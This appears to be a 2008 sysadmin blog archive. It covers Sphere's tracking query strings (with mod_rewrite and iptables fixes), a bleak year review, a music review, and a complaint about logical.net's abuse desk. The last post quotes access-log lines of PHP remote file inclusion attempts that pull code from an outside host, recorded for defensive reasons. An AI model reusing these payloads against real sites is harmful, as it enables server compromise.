Sphere adding query strings to search results
During my usual daily administrative tasks, I was less than pleased to discover that someone at Sphere apparently came up with a new idea. Or perhaps that idea has been around for quite a long time and I was merely fortunate enough to have been spared from learning of its existence. For those who do not know what I am referring to, here is a short explanation:
Sphere offer a widget for blogs that tries to present related blogposts for a particular subject. Perhaps not a bad idea in itself, maybe even a boon to those who want to research a subject and have a handy tool to consult more than one source prior to adding their own thoughts. However there seem to be some issues:
To these links a referer=sphere_search query string is appended. Even worse, it seems that other search engines are encouraged to crawl these modified links. As the search engine bot cannot differentiate between a useless query string and one that has been added on purpose, it will treat the original and the modified link as two separate pages showing the same and ultimately this can lead to the receiving end being hit by dreaded duplicate content penalties.
Google demonstrates that quite a few sites now have to put up with indexed pages they never wanted to have this way:
http://www.google.com/search?q=inurl:referer=sphere_search
This pretty much looks to me like some marketing expert had the brilliant idea of introducing the referrer tracking model of the adult content industry to the mainstream without the affected webmasters’ consent. If you have been hit by this nonsense too, you can easily spot it in your logfiles, like I did this morning:
66.249.73.232 – - [28/Dec/2008:11:18:13 +0100] “GET /goals-for-2008-revisited?referer=sphere_search HTTP/1.1″ 301 – “-” “Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)”
66.249.73.232 – - [28/Dec/2008:11:18:14 +0100] “GET /goals-for-2008-revisited/?referer=sphere_search HTTP/1.1″ 200 11189 “-” “Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)”
You may notice that the first request omitted the terminating slash of the uri, a bad habit Sphere’s bot has been exhibiting for years without anyone bothering to fix it. Now the hassle of addressing these malformed requests in order to limit the damage they can do has been added to the mix. Apache users may like to use a Mod Rewrite rule similar to this to work around the problem:
# broken sphere search
RewriteCond %{QUERY_STRING} .
RewriteCond %{QUERY_STRING} ^referer=sphere [NC]
RewriteRule (.*) http://www.example.com/$1/? [R=301,L]
I assume you know how to use Mod Rewrite, in case you don’t, please google for the basics before using this code, as inappropriate usage without understanding the implications can cause havoc to a server. Here is a brief explanation of what it does:
At first it is checked wether a query string is present and if so, whether it contains a value beginning with “referer=sphere”. If so, it will force a 301 redirect that strips this query string and re-adds the omitted terminal slash of our fake directory path. This is done by appending the question mark at the end of the variable. Now when disaster struck one of our pages, bots can be led to the actual source no matter what rubbish was originally picked up.
Of course this is merely curing symptoms. The source of the problem is this moronic addition of a query string which can only be fixed by Sphere. Surely I’m not the only one on this planet who feels annoyed by such nonsensical additions and perhaps in the end you can only opt out from their crawling:
The responsible outfit is located in this little corner of the web:
Votenet Solutions Inc, SAVV-S234898-5 (NET-64-14-117-224-1)
64.14.117.224 - 64.14.117.255
which equates to 64.14.117.224/27.
Opt-out can be understood in five ten fiftyfold ways:
One may add an entry to robots.txt, another to .htaccess or httpd.conf (depending on shared/dedicated hosting) and freaks like me prefer using iptables, so they need not see the clutter of failed requests in their logfiles:
# sphere.com: broken link generation
iptables -A INPUT -s 64.14.117.224/27 -i eth0 -j DROP
That should put an end to the affiliate link mess.
I cannot confidently say that I reached what I had in mind. Perhaps lack of effort, motivation to reach more. What I learnt though is that it is all about creating an illusion. Were I to revisit the idea of a netlabel today, I would advise to:
quit critical thinking and get used to presenting claims as undisputed facts
get used to considering an audience as helpless masses which eagerly await your instructions
exaggerate an artist’s, label’s or reviewer’s importance when outlining his achievements
emulate images, poses and phrases from today’s top mainstream stars.
find use and content in every submission and instruct people to do so, too
create accounts on every social networking site there is and collect strategically important friends
constantly repeat desired attributes people shall associate with you, your label and your artists
never argue with label owners or artists no matter how justified it appears
be sure to religiously follow the latest trends in music, buzzwords, gadges and web services
enrich Wikipedia with articles about your netlabel and its artists to inflate your importance
How about contacts? Some never get back to me in time, others confuse me with the doctor in ward nr. 6 or expect me to unconditionally admire them. Sometimes none of the former is happening, but in this case you can be sure that the conversation will die once the other side has accomplished its goals. Wear a mask, get used to it. There is no friendship, only different shades of solitude: One that manifests itself with being a stranger amongst many “friends”, another that unexpectedly cuts off conversations or one that never gets started at all.
If there was a change in 2008 then it was an increasing reluctance to write about me or subjects in general. Writing always implies importance of a subject. Thoughtless writing, however, can inadvertingly heighten subjects to an importance they never had. I approached the edge staring in Thanatos’ face and struggled to escape. He poisoned my thoughts, emphasising monotony, hopelessness and ignorance and yet I continued for reasons unknown to me.
I wrote better music and made better photographs, but my output slowed down notably towards the second half of the year. Perhaps the greatest advances were related to design. A mixed year. Things never turn out the way one would like them to see and instead prefer a steady state.
[tube150] Naoto Taguchi Untitled 9 Fragments Ordinaries Sound Materials
Naoto Taguchi, originally from Sapporo and currently living in Tokyo, is an audiovisual artist with a strong musical background (having played the piano since his early childhood) who is also interested in programming, photography, design in general and spinning records as a DJ. Locating himself inbetween a triangle of minimalist electronica, dubmatics and quirky experimental sounds his latest release on test tube entitled untitled 9 fragments ordinaries sound materials concentrates on the experimental side of his oeuvre.
The main concept consists of chopped sound snippets that were rearranged in a way they exhibit musical qualities despite a rather unmusical approach (A technique pioneered by Oval in the last century). The sound elements are not exactly repeated and therefore subtile changes prevail with each layer added and substracted as it is characteristic of a Minimalist music approach. Naoto Taguchi’s focus is keeping a snapshot of a moment just like on a photography that slowly reveals its details as the viewer gets lost in it. Untitled 9 Fragments Ordinaries Sound Materials uses the brightest colours for painting its soundscapes I’ve come across for a long time. It breathes the atmosphere of a sunny day at the coastline with sparkling reflections of waves in contre jour and seems to leave troubled thoughts and conflicts behind. This brightness finds its equivalent in patches of crystalline sounds slowly passing by like fibrious, wind torn cirrus clouds.
That these fragments are not charged with meaningful titles or philosophical instructions can be seen as a boon and the strong suggestive motifs enforcing intense associations made any kind of instructions superfluous anyway. The only thing I could see some room for improvement is of a technical nature: The tracks have apparently been limited a bit too much and as such most dynamic differences were levelled with a notable pumping effect on former sound spikes. Apart from this minor issue, Naoto Taguchi’s Untitled 9 Fragments Ordinaries Sound Materials is a truly wonderful release, probably one of my favourites of 2008, which demonstrates that even music rooted in tonality can exhibit most interesting structures if a skilled musician sets no limits to his imagination.
Update 27/12/08: Whilst the TestTube liner notes for today wrote about a late Christmas gift, the release was well in time for Leftob audio cast regulars, since I added the release to the playlist on December 24th – 3 days ahead of the official release date ;-)
Logical.net – abuse reports discouraged
I merely meant to be helpful when I took the time to notify logical.net of a compromised server possibly running an unpatched cPanel version that was hitting one of the servers I adminster with attempts at php remote inclusions:
209.23.116.97 – - [08/Dec/2008:11:55:28 +0100] “GET //admin/index.php?o=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1″ 403 217 “-” “Mozilla/5.0″
209.23.116.97 – - [08/Dec/2008:11:55:28 +0100] “GET /category//admin/index.php?o=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1″ 403 227 “-” “Mozilla/5.0″
209.23.116.97 – - [08/Dec/2008:11:55:28 +0100] “GET /category/spam/%20%20//admin/index.php?o=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1″ 403 235 “-” “Mozilla/5.0″
209.23.116.97 – - [08/Dec/2008:11:55:31 +0100] “GET /category/spam//admin/index.php?o=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1″ 403 232 “-” “Mozilla/5.0″
209.23.116.97 – - [08/Dec/2008:11:56:17 +0100] “GET /failed-blogspam-automation-from-china//admin/index.php?o=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1″ 403 256 “-” “Mozilla/5.0″
209.23.116.97 – - [08/Dec/2008:11:56:17 +0100] “GET /failed-blogspam-automation-from-china/%20%20//admin/index.php?o=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1″ 403 259 “-” “Mozilla/5.0″
209.23.116.97 has a PTR record of cpanel.acmenet.net, which looks quite telling in my opinion.
When looking up the address, I noticed that logical net did not differentiate between ranges for Internet service to endusers and webhosting, so unless you scan PTR records you may have no way of telling them apart, just one block for everything:
OrgName: Logical Net Corporation
OrgID: LNC
Address: 1593 Central Ave.
City: Albany
StateProv: NY
PostalCode: 12205
Country: US
NetRange: 209.23.0.0 – 209.23.127.255
CIDR: 209.23.0.0/17
NetName: LNET-A
NetHandle: NET-209-23-0-0-1
Parent: NET-209-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.LOGICAL.NET
NameServer: NS2.LOGICAL.NET
NameServer: NS3.LOGICAL.NET
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 1999-03-12
Updated: 2001-05-30
Nor could their routing give any more hints (sometimes it does):
route: 209.23.0.0/17
origin: AS3931
descr: LOGICAL – Logical Net Corporation
lastupd-frst: 2008-11-14 00:00Z 80.81.192.106@rrc12
lastupd-last: 2008-12-08 03:29Z 145.125.80.5@rrc00
seen-at: rrc00,rrc01,rrc04,rrc05,rrc06,rrc07,rrc10,rrc11,rrc12,rrc13,rrc14,rrc15,rrc16
num-rispeers: 96
source: RISWHOIS
According to whois, they at least have an abuse address and one is tempted to think, that it would be added for a reason other than looking “anti-spam”. As I soon had to discover right after having sent my abuse report, this does not seem to be the case with logical.net. Here is the automatically ignore bot reply I instantly received from them:
From: “Support” <support @ logical.net>
To: [some address]@gmail.com
Reply-To: support @ logical.net
Subject: Registration Required: Unable to create Ticket
Date: Mon, 08 Dec 2008 06:48:35 -0500
X-Mailer: Kayako eSupport v3.20.02Your ticket has not been accepted into the system. You are required to register at the following URL to submit any issues via Email: help.logical.net/index.php?_m=core&_a=register If you already have a registered account under a different email address you may log into our ticketing system Here: http://help.logical.net/
Once registered, you will be able to submit any issues directly by sending us Email. We are sorry for any inconvenience this may have caused.
Support
Note that I did write to abuse and got a reply from support instead. However, I did not ask for their help, as I already know how to adjust my defences in order to rid myself of neglegent, ignorant or even malicious network owners. I merely sent out a courtesy notice as I figured a compromised cPanel may be some kind of desaster for those who maintain their servers/domains with it. But apparently I was mistaken. Do Logical.net really believe to be so special that I happily would jump through their hoops just to notify them of their own negligence (notice the absurdity)? I can’t believe anyone right in one’s mind would cherish such a crazy notion, therefore I conclude third party notifications are not desired by logical.net, which is their right (aka their network, their rules). As it is mine to refuse traffic coming from their direction.
How to block them accessing my webservers without affecting innocent dial-up or DSL users? I spent some time looking up PTR records and noticed that the /24 which the compromised machine is part of, is exclusively populated by servers, mainly mailservers, but some webservers, too. The same applies to the neighbouring /24 so I resolved the problem by adding the following entry to both my mail- and webservers:
# logical.net do not wish to receive abuse reports
iptables -A INPUT -s 209.23.116.0/23 -i eth0 -p tcp -m tcp --syn -j REJECT
This way, if one of their mailservers should suddenly opt for spewing spams, I have the piece of mind of not being confronted with it. Or think of a moronic implementation of some autoresponder or challenge/response system which could be abused by spammers for hitting innocent bystanders with tons of backscatter.